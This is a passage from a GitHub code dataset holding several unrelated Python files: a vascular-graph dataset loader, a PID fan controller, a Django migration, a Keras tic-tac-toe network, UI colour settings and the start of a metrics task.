example_011()\n example_012()\n example_013()\n# See PyCharm help at https://www.jetbrains.com/help/pycharm/\n","repo_name":"misostack/python2021","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"2383933579","text":"import os, json\n\nimport numpy as np\n\nimport torch\nfrom torch_geometric.data import InMemoryDataset, Data\n\nfrom sklearn.model_selection import train_test_split\n\nfrom extracranial_vessel_labelling.data.utils import load_pickle, node_transform\n\nclass EVCDataset(InMemoryDataset):\n \"\"\"\n Dataset class for the Extarcranial Vascular Centerline (EVC) dataset. The dataset is\n composed of centerline graphs generated from vascular segmentations from Full head-and-neck \n CTA images, from which the centerlines of the extracranial vessels were extracted. The original \n dataset contains centerline graphs from 561 cases. Nodes correspond to bifurcations, while edges\n correspond to vascular segments. The graphs contained manually labelled vessel types for each edge.\n However, we perform a node transform to the graphs, converting edges into nodes and maintaining connectivity \n by adding edges to all segments immediately in contact in all bifurcation points. This way, we convert \n the problem to a node classification task.\n\n All vessels are a type of either of these 14 classes: other, AA, BT, RCCA, LCCA, RSA, LSA, RVA, \n LVA, RICA, LICA, RECA, LECA, BA.\n\n The dataset description json file is mandatory for normalizaiton purposes. If it is not found, it will be\n created from the raw data. \n\n Parameters\n ----------\n root : str\n Path to the root folder of the dataset. We assume that raw_dir (`raw`) and processed_dir (`processed`) \n are subfolders of root.\n raw_file_names : list of str, optional\n List of raw file names, by default None. If None, all files in raw_dir are used.\n processed_file_names : list of str, optional\n List of processed file names, by default None. If None, all files in processed_dir are used.\n pre_transform : object, optional\n Pre-transform object, by default None. It should input a Data object and output a Data object.\n\n \"\"\"\n def __init__(self, root, raw_file_names_list = None, processed_file_names_list = None, pre_transform = None, transform = None):\n if os.path.exists(os.path.join(root, \"dataset.json\")):\n pass\n else:\n print(\"No dataset description file found. Creating dataset description file from raw dir data.\")\n generate_EVC_dataset_json(root)\n with open(os.path.join(root, \"dataset.json\"), \"r\") as f:\n self.dataset_description = json.load(f)\n self.raw_file_names_list = raw_file_names_list\n self.processed_file_names_list = processed_file_names_list\n\n super(EVCDataset, self).__init__(root=root, pre_transform=pre_transform, transform=transform)\n self.process()\n\n @property\n def raw_file_names(self):\n if self.raw_file_names_list is not None:\n return self.raw_file_names_list\n else:\n return [f for f in sorted(os.listdir(self.raw_dir)) if f.endswith(\".pickle\")]\n\n @property\n def processed_file_names(self):\n if self.processed_file_names_list is not None:\n return self.processed_file_names_list\n else:\n return [f for f in sorted(os.listdir(self.processed_dir)) if f.endswith(\".pt\")]\n\n def process(self): \n # Here you would read your raw files, create Data objects, and apply any pre-transforms\n data_list = []\n for raw_file in self.raw_file_names:\n graph_nx = node_transform(load_pickle(os.path.join(self.raw_dir, raw_file)))\n # Pytorch data object\n data = Data()\n x, edge_index, y, pos = [], [], [], []\n for node in graph_nx.nodes:\n pos.append(graph_nx.nodes[node][\"pos\"])\n x.append(graph_nx.nodes[node][\"features\"])\n y.append(graph_nx.nodes[node][\"vessel_type\"])\n for n0, n1 in graph_nx.edges:\n edge_index.append(np.array([n0, n1]))\n data.pos = torch.tensor(np.array(pos), dtype=torch.float32)\n data.x = self.normalize_edge_features(torch.tensor(np.array(x), dtype=torch.float32))\n data.edge_index = torch.transpose(torch.tensor(np.array(edge_index), dtype=torch.int64), 1, 0)\n data.y = torch.tensor(np.array(y), dtype=torch.int64)\n data.num_nodes = len(graph_nx.nodes)\n data.num_edges = len(graph_nx.edges)\n data.raw_file_path = raw_file\n data.processed_file_path = os.path.join(self.processed_dir, \"{}.pt\".format(raw_file.split(\".\")[0]))\n if self.pre_transform is not None:\n data = self.pre_transform(data)\n data_list.append(data)\n torch.save(data, data.processed_file_path)\n \n self.data_list = data_list\n\n def get_splits(self, train_files=None, test_files=None, train_idx=None, test_idx=None, test_size=0.2, random_state=42):\n \"\"\"\n Creates train and test splits from the dataset.\n\n Use cases:\n 1. Provide train_files and test_files: train and test splits are created from the provided file lists.\n Example: \n train_files = [\"file1.pickle\", \"file2.pickle\", \"file3.pickle\"]\n test_files = [\"file4.pickle\", \"file5.pickle\", \"file6.pickle\"]\n train_dataset, test_dataset = dataset.get_splits(train_files=train_files, test_files=test_files)\n 2. Provide train_idx and test_idx: train and test splits are created from the provided indices.\n Example:\n train_idx = [0, 1, 2]\n test_idx = [3, 4, 5]\n train_dataset, test_dataset = dataset.get_splits(train_idx=train_idx, test_idx=test_idx)\n 3. Provide only test_size: train and test splits are created randomly with the provided test_size. Random state can be provided.\n Example:\n test_size = 0.2\n train_dataset, test_dataset = dataset.get_splits(test_size=test_size)\n\n Parameters\n ----------\n train_files : list of str, optional\n List of train files, by default None\n test_files : list of str, optional\n List of test files, by default None\n train_idx : list of int, optional\n List of train indices, by default None\n test_idx : list of int, optional\n List of test indices, by default None\n test_size : float, optional\n Test size, by default 0.2\n random_state : int, optional\n Random state, by default 42\n\n Returns\n -------\n train_dataset : torch_geometric.data.InMemoryDataset\n Train dataset\n test_dataset : torch_geometric.data.InMemoryDataset\n Test dataset\n \"\"\"\n if train_files is not None and test_files is not None:\n if train_files[0].endswith(\".pickle\") and train_files[0] in self.raw_file_names:\n train_idx = [self.raw_file_names.index(file) for file in train_files]\n test_idx = [self.raw_file_names.index(file) for file in test_files]\n elif train_files[0].endswith(\".pt\") and train_files[0] in self.processed_file_names:\n train_idx = [self.processed_file_names.index(file) for file in train_files]\n test_idx = [self.processed_file_names.index(file) for file in test_files]\n else:\n print(\"Provided file lists are not valid, defaulting to random split (test_size = {:.2f}).\".format(test_size))\n pass\n elif train_idx is not None and test_idx is not None:\n pass # Use the provided indices directly\n else:\n indices = list(range(len(self.raw_file_names)))\n train_idx, test_idx = train_test_split(indices, test_size=test_size, train_size = 1 - test_size, random_state=random_state)\n \n # Get the file names for the train and test splits\n train_files = [self.raw_file_names[i] for i in train_idx]\n test_files = [self.raw_file_names[i] for i in test_idx]\n\n # Create new dataset instances for the train and test splits\n train_dataset = EVCDataset(self.root, raw_file_names_list=train_files, pre_transform=self.pre_transform)\n test_dataset = EVCDataset(self.root, raw_file_names_list=test_files, pre_transform=self.pre_transform)\n\n return train_dataset, test_dataset\n\n def normalize_edge_features(self, edge_features):\n def z_score_normalization(edge_features, mean, std):\n return (edge_features - mean) / std\n def min_max_normalization(edge_features, min, max):\n return (edge_features - min) / (max - min)\n def mean_centering_normalization(edge_features, mean):\n return edge_features - mean\n def ensure_normalized_vectors(edge_features):\n return edge_features / torch.norm(edge_features, dim=1, keepdim=True)\n \n if self.dataset_description is None:\n print(\"No dataset description file found. This will be an issue for normalization of edge features.\")\n return edge_features\n else:\n # Compute min max values after mean centering for landmark positions normalization\n mean_position = self.dataset_description[\"mean_edge_features\"][21:24]\n min_edge_features_mc = self.dataset_description[\"min_edge_features\"].copy()\n max_edge_features_mc = self.dataset_description[\"max_edge_features\"].copy()\n # Mean centering for r coordinates\n for idx in [15, 18, 21]:\n min_edge_features_mc[idx] -= mean_position[0]\n max_edge_features_mc[idx] -= mean_position[0]\n # Mean centering for a coordinates\n for idx in [16, 19, 22]:\n min_edge_features_mc[idx] -= mean_position[1]\n max_edge_features_mc[idx] -= mean_position[1]\n # Mean centering for s coordinates\n for idx in [17, 20, 23]:\n min_edge_features_mc[idx] -= mean_position[2]\n max_edge_features_mc[idx] -= mean_position[2]\n for idx, feature_name in enumerate(self.dataset_description[\"edge_feature_names\"]):\n # For distance or continuous features, we apply z-score normalization\n if feature_name in [\"mean radius\", \"proximal radius\", \"distal radius\", \"proximal/distal radius ratio\", \"minimum radius\", \"maximum radius\", \"distance\", \"relative length\"]:\n edge_features[:, idx] = z_score_normalization(edge_features[:, idx], self.dataset_description[\"mean_edge_features\"][idx], self.dataset_description[\"std_edge_features\"][idx])\n # For number of points, we apply min-max normalization\n elif feature_name in [\"number of points\"]:\n edge_features[:, idx] = min_max_normalization(edge_features[:, idx], self.dataset_description[\"min_edge_features\"][idx], self.dataset_description[\"max_edge_features\"][idx])\n # For positional features, we apply mean centering normalization followed by min-max normalization\n elif feature_name in [\"proximal bifurcation position r\", \"proximal bifurcation position a\", \"proximal bifurcation position s\", \n \"distal bifurcation position r\", \"distal bifurcation position a\", \"distal bifurcation position s\", \n \"pos r\", \"pos a\", \"pos s\"]:\n edge_features[:, idx] = mean_centering_normalization(edge_features[:, idx], self.dataset_description[\"mean_edge_features\"][idx])\n edge_features[:, idx] = min_max_normalization(edge_features[:, idx], min_edge_features_mc[idx], max_edge_features_mc[idx])\n # For direction and departure angle, we ensure normalized vectors\n edge_features[:, 8:11] = ensure_normalized_vectors(edge_features[:, 8:11]) # Direction\n edge_features[:, 11:14] = ensure_normalized_vectors(edge_features[:, 11:14]) # Departure angle\n\n return edge_features\n \n def __len__(self) -> int:\n return len(self.data_list)\n \n def __getitem__(self, idx):\n data = self.data_list[idx]\n if self.transform is not None:\n data = self.transform(data)\n \n return data\n \ndef generate_EVC_dataset_json(\n root, \n dataset_name = \"Extracranial vascular centerlines\",\n name_node_features = None,\n name_edge_features = \"features\",\n name_graph_features = None,\n name_graph_label = None,\n name_node_label = None,\n name_edge_label = \"vessel_type\",\n graph_labels_dict = None,\n node_labels_dict = None,\n edge_labels_dict = dict(zip([idx for idx in range(14)], [\"other\", \"AA\", \"BT\", \"RCCA\", \"LCCA\", \"RSA\", \"LSA\", \"RVA\", \"LVA\", \"RICA\", \"LICA\", \"RECA\", \"LECA\", \"BA\"]))\n ):\n \"\"\"\n Generates a json file with the dataset information. Saves the file in the root folder:\n\n >>> os.path.join(os.path.join(root, \"dataset.json\"))\n\n Parameters\n ----------\n root : str\n Path to the root folder of the dataset.\n dataset_name : str, optional\n Name of the dataset, by default \"Extracranial vascular centerlines\"\n name_node_features : str, optional\n Name of the node features, by default None\n name_edge_features : str, optional\n Name of the edge features, by default \"features\"\n name_graph_features : str, optional\n Name of the graph features, by default None\n name_graph_label : str, optional\n Name of the graph label, by default None\n name_node_label : str, optional\n Name of the node label, by default None\n name_edge_label : str, optional\n Name of the edge label, by default \"vessel_type\"\n graph_labels_dict : dict, optional\n Dictionary with the graph labels, by default None\n node_labels_dict : dict, optional \n Dictionary with the node labels, by default None\n edge_labels_dict : dict, optional\n Dictionary with the edge labels, by default \n dict(zip([idx for idx in range(14)], [\"other\", \"AA\", \"BT\", \"RCCA\", \"LCCA\", \"RSA\", \"LSA\", \"RVA\", \"LVA\", \"RICA\", \"LICA\", \"RECA\", \"LECA\", \"BA\"]))\n \"\"\"\n # Define raw_dir\n raw_dir = os.path.join(root, \"raw\")\n # Read filenames\n filenames = sorted([f for f in os.listdir(raw_dir) if f.endswith(\".pickle\")])\n # Load the data\n raw_data_list = [load_pickle(os.path.join(raw_dir, f)) for f in filenames]\n\n # Some data are just hardcoded\n # dataset_name = \"Extracranial vascular centerlines\"\n # name_graph_features = None\n # name_node_features = None\n # name_edge_features = \"features\"\n # name_graph_label = None\n # name_node_label = None\n # name_edge_label = \"vessel_type\"\n # graph_labels_dict = None\n # node_labels_dict = None\n # edge_labels_dict = dict(zip([idx for idx in range(14)], [\"other\", \"AA\", \"BT\", \"RCCA\", \"LCCA\", \"RSA\", \"LSA\", \"RVA\", \"LVA\", \"RICA\", \"LICA\", \"RECA\", \"LECA\", \"BA\"]))\n num_graph_classes = None\n num_node_classes = None\n num_edge_classes = len(edge_labels_dict)\n total_number_of_examples = len(raw_data_list)\n\n # Others are derived from a single example\n example = raw_data_list[0]\n if name_graph_features is None:\n num_graph_features = 0\n graph_feature_names = None\n else:\n num_graph_features = len(example.graph[name_graph_features])\n if name_graph_features + \"_dict\" in example.graph:\n graph_feature_names = list(example.graph[name_graph_features + \"_dict\"].keys())\n else:\n graph_feature_names = None\n if name_node_features is None:\n num_node_features = 0\n node_feature_names = None\n else:\n num_node_features = len(example.nodes[0][name_node_features])\n if name_node_features + \"_dict\" in example.nodes[0]:\n node_feature_names = list(example.nodes[0][name_node_features + \"_dict\"].keys())\n else:\n node_feature_names = None\n if name_edge_features is None:\n num_edge_features = 0\n edge_feature_names = None\n else:\n num_edge_features = len(example[0][1][name_edge_features])\n if name_edge_features + \"_dict\" in example[0][1]:\n edge_feature_names = list(example[0][1][name_edge_features + \"_dict\"].keys())\n else:\n edge_feature_names = None\n\n # For the rest, we have to iterate over the dataset\n total_number_of_nodes = 0\n total_number_of_edges = 0\n\n graph_featues_array = np.zeros((num_graph_features, 0))\n node_featues_array = np.zeros((num_node_features, 0))\n edge_featues_array = np.zeros((num_edge_features, 0))\n\n for example in raw_data_list:\n total_number_of_nodes += len(example.nodes)\n total_number_of_edges += len(example.edges)\n if name_graph_features is not None:\n graph_featues_array = np.concatenate((graph_featues_array, np.expand_dims(example.graph[name_graph_features], axis = 1)), axis=1)\n if name_node_features is not None:\n for node in example.nodes:\n node_featues_array = np.concatenate((node_featues_array, np.expand_dims(example.nodes[node][name_node_features], axis = 1)), axis=1)\n if name_edge_features is not None:\n for src, dst in example.edges:\n edge_featues_array = np.concatenate((edge_featues_array, np.expand_dims(example[src][dst][name_edge_features], axis = 1)), axis=1)\n\n average_number_of_nodes = total_number_of_nodes / total_number_of_examples\n average_number_of_edges = total_number_of_edges / total_number_of_examples\n\n # We can also compute class frequencies for loss weighting\n if name_graph_label is not None:\n graph_class_frequencies = np.zeros(num_graph_classes)\n for example in raw_data_list:\n for src, dst in example.graphs:\n graph_class_frequencies[example[src][dst][name_graph_label]] += 1\n\n graph_class_frequencies /= np.sum(graph_class_frequencies)\n else:\n graph_class_frequencies = np.zeros(0)\n # For nodes\n if name_node_label is not None:\n node_class_frequencies = np.zeros(num_node_classes)\n for example in raw_data_list:\n for src, dst in example.nodes:\n node_class_frequencies[example[src][dst][name_node_label]] += 1\n node_class_frequencies /= np.sum(node_class_frequencies)\n else:\n node_class_frequencies = np.zeros(0)\n # For edges\n if name_edge_label is not None:\n edge_class_frequencies = np.zeros(num_edge_classes)\n for example in raw_data_list:\n for src, dst in example.edges:\n edge_class_frequencies[example[src][dst][name_edge_label]] += 1\n edge_class_frequencies /= np.sum(edge_class_frequencies)\n else:\n edge_class_frequencies = np.zeros(0)\n\n # Now, just create the json file\n dataset_dict = {\n \"dataset_name\": dataset_name,\n \"total_number_of_examples\": total_number_of_examples,\n \"total_number_of_nodes\": total_number_of_nodes,\n \"total_number_of_edges\": total_number_of_edges,\n \"average_number_of_nodes\": average_number_of_nodes,\n \"average_number_of_edges\": average_number_of_edges,\n \"name_graph_features\": name_graph_features,\n \"name_node_features\": name_node_features,\n \"name_edge_features\": name_edge_features,\n \"num_graph_features\": num_graph_features,\n \"num_node_features\": num_node_features,\n \"num_edge_features\": num_edge_features,\n \"graph_feature_names\": graph_feature_names,\n \"node_feature_names\": node_feature_names,\n \"edge_feature_names\": edge_feature_names,\n \"name_graph_label\": name_graph_label,\n \"name_node_label\": name_node_label,\n \"name_edge_label\": name_edge_label,\n \"graph_labels_dict\": graph_labels_dict,\n \"node_labels_dict\": node_labels_dict,\n \"edge_labels_dict\": edge_labels_dict,\n \"num_graph_classes\": num_graph_classes,\n \"num_node_classes\": num_node_classes,\n \"num_edge_classes\": num_edge_classes,\n \"graph_class_frequencies\": graph_class_frequencies.tolist() if len(graph_featues_array) > 0 else None,\n \"node_class_frequencies\": node_class_frequencies.tolist() if len(graph_featues_array) > 0 else None,\n \"edge_class_frequencies\": edge_class_frequencies.tolist() if len(graph_featues_array) > 0 else None,\n \"mean_graph_features\": np.mean(graph_featues_array, axis=1).tolist() if len(graph_featues_array) > 0 else None,\n \"median_graph_features\": np.median(graph_featues_array, axis=1).tolist() if len(graph_featues_array) > 0 else None,\n \"std_graph_features\": np.std(graph_featues_array, axis=1).tolist() if len(graph_featues_array) > 0 else None,\n \"min_graph_features\": np.min(graph_featues_array, axis=1).tolist() if len(graph_featues_array) > 0 else None,\n \"max_graph_features\": np.max(graph_featues_array, axis=1).tolist() if len(graph_featues_array) > 0 else None,\n \"mean_node_features\": np.mean(node_featues_array, axis=1).tolist() if len(node_featues_array) > 0 else None,\n \"median_node_features\": np.median(node_featues_array, axis=1).tolist() if len(node_featues_array) > 0 else None,\n \"std_node_features\": np.std(node_featues_array, axis=1).tolist() if len(node_featues_array) > 0 else None,\n \"min_node_features\": np.min(node_featues_array, axis=1).tolist() if len(node_featues_array) > 0 else None,\n \"max_node_features\": np.max(node_featues_array, axis=1).tolist() if len(node_featues_array) > 0 else None,\n \"mean_edge_features\": np.mean(edge_featues_array, axis=1).tolist() if len(edge_featues_array) > 0 else None,\n \"median_edge_features\": np.median(edge_featues_array, axis=1).tolist() if len(edge_featues_array) > 0 else None,\n \"std_edge_features\": np.std(edge_featues_array, axis=1).tolist() if len(edge_featues_array) > 0 else None,\n \"min_edge_features\": np.min(edge_featues_array, axis=1).tolist() if len(edge_featues_array) > 0 else None,\n \"max_edge_features\": np.max(edge_featues_array, axis=1).tolist() if len(edge_featues_array) > 0 else None\n }\n\n # Save the json file\n with open(os.path.join(root, \"dataset.json\"), \"w\") as f:\n json.dump(dataset_dict, f, indent=4)","repo_name":"perecanals/EVC","sub_path":"extracranial_vessel_labelling/data/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":22317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"5257725066","text":"#!/usr/bin/env python3\nfrom simple_pid import PID\nimport time, glob, yaml, subprocess\n\nclass PwmFan:\n def __init__(self, name, devPath, minPwm, maxPwm, press_srcs):\n assert minPwm < maxPwm\n assert minPwm >= 0 and minPwm <= 255\n assert maxPwm >= 0 and maxPwm <= 255\n self.name = name\n self.devPath = devPath\n self.minPwm = minPwm\n self.maxPwm = maxPwm\n self.range = self.maxPwm - self.minPwm\n self.press_srcs = press_srcs\n\n def set_speed(self, percentage, dry_run=False):\n \"\"\"\n set fan speed, 0-100%. The PWM value will be calculated from minPwm and\n maxPwm\n \"\"\"\n assert percentage >= 0.0 and percentage <= 1.0\n pwm = self.minPwm + self.range * percentage\n if dry_run:\n print(self.devPath, int(pwm))\n else:\n with open(self.devPath, 'w') as f:\n f.write(str(int(pwm)))\n\n def get_pressure_srcs(self):\n return self.press_srcs\n\nclass TempSensor:\n def __init__(self, devPath):\n self.devPath = devPath\n\n def read_temp(self):\n f = open(self.devPath, 'r')\n # integer type temperature in milli degrees\n temp = str(f.read()).strip()\n f.close()\n # convert to float degrees\n return int(temp)/1000.0\n\nclass CmdTempSensor:\n def __init__(self, temp_cmd):\n self.temp_cmd = temp_cmd\n\n def read_temp(self):\n completedCmd = subprocess.run(\n self.temp_cmd,\n check=True,\n shell=True,\n text=True,\n capture_output=True)\n # convert to float degrees\n return int(completedCmd.stdout)/1.0\n\nclass HeatPressureSrc:\n def __init__(self, name, path, temp_cmd, set_point, P, I, D, sample_interval):\n self.name = name\n self.path = path\n self.temp_cmd = temp_cmd\n self.set_point = set_point\n self.P = P\n self.I = I\n self.D = D\n self.sample_interval = sample_interval\n if self.temp_cmd is not None:\n self.temp_sensor = CmdTempSensor(temp_cmd)\n else:\n self.temp_sensor = TempSensor(path)\n self.pid_controller = PID(self.P, self.I, self.D,\n setpoint=self.set_point,\n output_limits=(0.0, 1.0),\n sample_time=self.sample_interval\n )\n\n def get_heat_pressure(self):\n temperature = self.temp_sensor.read_temp()\n heat_pressure = self.pid_controller(temperature)\n return heat_pressure\n\n def get_name(self):\n return self.name\n\ndef get_only_one_wildcard_match(wc_path):\n should_be_a_single_path = glob.glob(wc_path)\n assert len(should_be_a_single_path) == 1\n return should_be_a_single_path[0]\n\ndef instantiate_fan(cfg):\n name = cfg['name']\n wc_path = cfg['wildcard_path']\n min_pwm = cfg['min_pwm']\n max_pwm = cfg['max_pwm']\n press_srcs = cfg['heat_pressure_srcs']\n path = get_only_one_wildcard_match(wc_path)\n\n return PwmFan(name, path, min_pwm, max_pwm, press_srcs)\n\ndef instantiate_hp_src(cfg, sample_interval):\n name = cfg['name']\n PID_params = cfg['PID_params']\n if 'wildcard_path' in cfg:\n wc_path = cfg['wildcard_path']\n path = get_only_one_wildcard_match(wc_path)\n else:\n path = None\n temp_cmd = cfg['temp_cmd'] if 'temp_cmd' in cfg else None\n if (path or temp_cmd) is None:\n print(cfg)\n raise RuntimeError(\"Neither `temp_cmd` or `wildcard_path` exists\")\n\n return HeatPressureSrc(name = name, path = path,\n temp_cmd = temp_cmd,\n set_point = PID_params['set_point'],\n P = PID_params['P'],\n I = PID_params['I'],\n D = PID_params['D'],\n sample_interval = sample_interval\n )\nclass PID_fan_controller:\n def __init__(self, config_file):\n with open(config_file, 'r') as f:\n try:\n self.config = yaml.load(f, Loader=yaml.FullLoader)\n except yaml.YAMLError as exc:\n print(\"Error in loading the config file:\", CONFIG_FILE, '\\n',exc)\n exit(1)\n self.sample_interval = self.config['sample_interval']\n self.heat_pressure_srcs = [ instantiate_hp_src(hp_cfg, self.sample_interval) for hp_cfg in self.config[\"heat_pressure_srcs\"] ]\n self.fans = [ instantiate_fan(fan_config) for fan_config in self.config[\"fans\"] ]\n\n def run_loop(self, dry_run=False):\n while True:\n heat_pressures = {}\n for hp in self.heat_pressure_srcs:\n name = hp.get_name()\n pressure = hp.get_heat_pressure()\n heat_pressures[name] = pressure\n\n for fan in self.fans:\n press_srcs = fan.get_pressure_srcs()\n hp = [ heat_pressures[hp_src] for hp_src in press_srcs ]\n highest_pressure = max(hp)\n fan.set_speed(highest_pressure, dry_run)\n\n time.sleep(self.sample_interval)\n\n def override_fan_auto_control(self, override, dry_run=False):\n for fan in self.config['fans']:\n pwm_modes = fan['pwm_modes']\n path = get_only_one_wildcard_match(pwm_modes['pwm_mode_wildcard_path'])\n mode = pwm_modes['manual'] if override else pwm_modes['auto']\n if dry_run:\n print(path, mode)\n else:\n with open(path, 'w') as f:\n f.write(str(mode))\n\n def set_manual_fan_speed(self, fan_speed, dry_run=False):\n for fan in self.fans:\n fan.set_speed(fan_speed/100.0, dry_run)\n","repo_name":"ThunderMikey/pid_fan_controller","sub_path":"pid_fan_controller.py","file_name":"pid_fan_controller.py","file_ext":"py","file_size_in_byte":5644,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"68"} +{"seq_id":"73019453978","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('topic', '0034_topic_img1'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Daka',\n fields=[\n ('id', models.AutoField(db_index=True, serialize=False, primary_key=True)),\n ('date', models.CharField(max_length=500)),\n ('timestamp', models.DateTimeField(auto_now_add=True, null=True)),\n ('user', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ],\n ),\n ]\n","repo_name":"kij8323/mynewspaper","sub_path":"topic/migrations/0035_daka.py","file_name":"0035_daka.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"34682699022","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nNeuralNet for the game of TicTacToe.\nAuthors: Evgeny Tyurin, github.com/evg-tyurin, github @suragnair @ozzi7, possibly others\n\nBased on the OthelloNNet by SourKream and Surag Nair.\n\nconv2d weights order:\n\"That's the tensorflow convention, the kernel shape is (kernel_height, kernel_width, input_channels, output_channels).\n(output_channels, input_channels, kernel_height, kernel_width)\nTo reverse it, you can always just get the value and transpose it appropriately,\ne.g. with filters = model.get_weights()[0][:, :, 0, :].transpose((2, 1, 0)).\"\n\n\"\"\"\n\nimport argparse\nfrom keras.models import *\nfrom keras.layers import *\nfrom keras.optimizers import *\n\n# game params\nBOARD_X=5\nBOARD_Y=5\nNOF_INPUT_PLANES=3\nNOF_POLICIES=25\nNOF_FILTERS=32\nNOF_VALUE_FILTERS=32\nNOF_POLICY_FILTERS=32\nNOF_FC_NEURONS_VAL_LAYER=32\nNOF_RES_LAYERS=6\nLEARNING_RATE=0.0001 # was 0.001\n\n\nclass TicTacToeNet:\n def __init__(self):\n self.input_boards = Input(shape=(BOARD_X, BOARD_Y, NOF_INPUT_PLANES)) # s: batch_size x board_x x board_y\n x = Conv2D(filters=NOF_FILTERS,\n kernel_size=(3,3),\n padding='same', activation='linear', use_bias=False,\n data_format=\"channels_last\")(self.input_boards)\n\n x = BatchNormalization(axis=3)(x) # axis -1 is equal to 3 here, means last dimension\n x = LeakyReLU()(x)\n for _ in range(NOF_RES_LAYERS):\n x = self.residual_layer(x, NOF_FILTERS,\n (3,3))\n self.value_head = self.value_head(x)\n self.policy_head = self.policy_head(x)\n\n self.model = Model(inputs=[self.input_boards], outputs=[self.policy_head, self.value_head])\n self.model.compile(loss=['categorical_crossentropy', 'mean_squared_error'], optimizer=Adam(LEARNING_RATE))\n #self.model.summary()\n\n def conv_layer(self, x, filters, kernel_size):\n x = Conv2D(\n filters=filters\n , kernel_size=kernel_size\n , padding='same'\n , activation='linear'\n , use_bias=False\n\n )(x)\n\n x = BatchNormalization(axis=3)(x)\n x = LeakyReLU()(x)\n\n return (x)\n\n def residual_layer(self, input_block, filters, kernel_size):\n \"\"\"\n The residual layer\n :param input_block: input of CNN\n :param filters: how many filters?\n :param kernel_size: the kernel of the CNN\n :return:\n \"\"\"\n x = self.conv_layer(input_block, filters, kernel_size)\n\n x = Conv2D(\n filters=filters\n , kernel_size=kernel_size\n , padding='same'\n , activation='linear'\n , use_bias=False\n\n )(x)\n\n x = BatchNormalization(axis=3)(x)\n x = add([input_block, x])\n x = LeakyReLU()(x)\n\n return (x)\n\n def value_head(self, x):\n \"\"\"\n The value head that will be optimized with the reward as the target\n Using tanh as the activation function.\n :param x: the input from the residual layer\n :return:\n \"\"\"\n x = Conv2D(\n filters=NOF_VALUE_FILTERS\n , kernel_size=(1,1)\n , padding='same'\n , activation='linear'\n , use_bias=False\n\n )(x)\n\n x = BatchNormalization(axis=3)(x)\n x = LeakyReLU()(x)\n x = Permute((3, 1, 2), input_shape=(5, 5, NOF_VALUE_FILTERS))(x)\n x = Flatten()(x)\n # noinspection PyPackageRequirements\n x = Dense(\n NOF_FC_NEURONS_VAL_LAYER\n , activation='linear'\n )(x)\n\n x = LeakyReLU()(x)\n x = Dense(\n 1\n , activation='tanh'\n , name='value_head'\n )(x)\n x = Dropout(0.1)(x)\n\n return (x)\n\n def policy_head(self, x):\n \"\"\"\n The policy head that will be optimized with the action prob as the target.\n Using softmax as the activation function.\n :param x: the input from the residual layer\n :return:\n \"\"\"\n x = Conv2D(\n filters = NOF_POLICY_FILTERS\n , kernel_size = (1,1)\n , padding = 'same'\n , activation='linear', use_bias=False)(x)\n\n x = BatchNormalization()(x)\n x = LeakyReLU()(x)\n x = Permute((3,1,2), input_shape=(5,5,NOF_POLICY_FILTERS))(x)\n x = Flatten()(x)\n x = Dense( # this is equivalent to dense layer + softmax layer, but combined\n NOF_POLICIES\n , activation='softmax'\n , name ='policy_head'\n )(x)\n\n x = Dropout(0.1)(x)\n\n return (x)\n\n def dump_weights(self):\n f = open(\"weights.txt\", \"w\")\n for layer in self.model.layers:\n weights = layer.get_weights() # list of numpy arrays\n if weights: # if no weights\n for w in weights: # sometimes there is bias as well\n try:\n w2 = np.transpose(w, (3, 2, 0, 1)) # (3,..) = move that was last to first place\n np.savetxt(f, w2.flatten(order='C'), delimiter=',', newline=\" \")\n f.write(\"\\n\")\n\n except:\n np.savetxt(f, w.flatten(order='C'), delimiter=',', newline=\" \")\n f.write(\"\\n\")\n f.close()\n\n def calculate_loss(self):\n self.target_pis = tf.placeholder(tf.float32, shape=[None, NOF_POLICIES])\n self.target_vs = tf.placeholder(tf.float32, shape=[None])\n self.loss_pi = tf.losses.softmax_cross_entropy(self.target_pis, self.pi)\n self.loss_v = tf.losses.mean_squared_error(self.target_vs, tf.reshape(self.v, shape=[-1,]))\n self.total_loss = self.loss_pi + self.loss_v\n update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n with tf.control_dependencies(update_ops):\n self.train_step = tf.train.AdamOptimizer(self.args.lr).minimize(self.total_loss)","repo_name":"ozzi7/TicTacToe-DL-RL","sub_path":"Training/tictactoe_nn.py","file_name":"tictactoe_nn.py","file_ext":"py","file_size_in_byte":5969,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"68"} +{"seq_id":"1040886515","text":"colors = {\"background_color\": \"#99C4C8\",\n \"dark_sea\": \"#68A7AD\",\n \"light_yellow\": \"#EEE4AB\",\n \"peach\": \"#E5CB9F\",\n \"purple\": \"#533E85\"\n }\n\nfonts = {\n \"title_font\": (\"Roboto\", 40, \"bold\"),\n \"footer_font\": (\"Roboto\", 14, \"normal\"),\n \"button_font\": (\"Roboto\", 20, \"bold\")\n}\n","repo_name":"MarcinZ20/SortingAlgorithms","sub_path":"dev/ui/specs.py","file_name":"specs.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"4362339864","text":"from paips2.core import Task\nimport numpy as np\nimport inspect\n\nclass CalculateMetrics(Task):\n def get_valid_parameters(self):\n return ['y_pred', 'y_target'], ['backend_library', 'metrics', 'labels']\n\n def process(self):\n preds = self.config['y_pred']\n targets = self.config['y_target']\n labels = self.config.get('labels')\n backend_library = self.config.get('backend_library','sklearn')\n metrics = self.config.get('metrics',['accuracy_score',\n 'confusion_matrix',\n 'f1_score',\n 'precision_score',\n 'recall_score',\n 'roc_curve',\n 'roc_auc_score',\n 'average_precision_score',\n 'precision_recall_curve'])\n results = {}\n targets = 